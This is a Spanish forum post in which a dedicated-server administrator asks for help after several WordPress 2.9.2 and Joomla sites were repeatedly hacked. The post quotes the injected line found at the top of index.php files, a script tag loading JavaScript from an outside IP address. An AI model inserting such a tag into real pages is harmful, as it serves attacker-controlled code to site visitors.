Hola, controlo un servidor dedicado en el cual tengo unas 70 páginas web alojadas de estas una vez 3 fueron "hackeadas" y a la segunda una web de esas 3 otra vez padeció el hack.
El hack en las 3 webs es el mismo y de estas 2 son WP y otra es Joomla.
Actualmente la web fue hackeada otra vez y está en WP, el hack consite en que en el index.php de la home y en el index.php del wp-admin queda inyectado al principio del fichero el siguiente script:
<script type="text/javascript" src="http://213.175.200.227/js.php"></script>
quitándolo se soluciona el problema, pero claro me va a volver a pasar.
Es un problema de seguridad del servidor o de los CMSs ?
La versión del WP hackeado es 2.9.2
<meta name="generator" content="WordPress 2.9.2" />
Creo que las contraseñas son correctas en lo referente a FTP, pero no me cabe duda de que en el servidor dedicado haya contraseñas a otras webs que sean accesibles...
Podéis comentarme algo al respecto? algo de ayuda por favor porque no sé como solucionarlo.
Aviso que soy espabilado y un empujón en la dirección correcta... yo
me lo curro!
Muchas gracias por responder de antelación!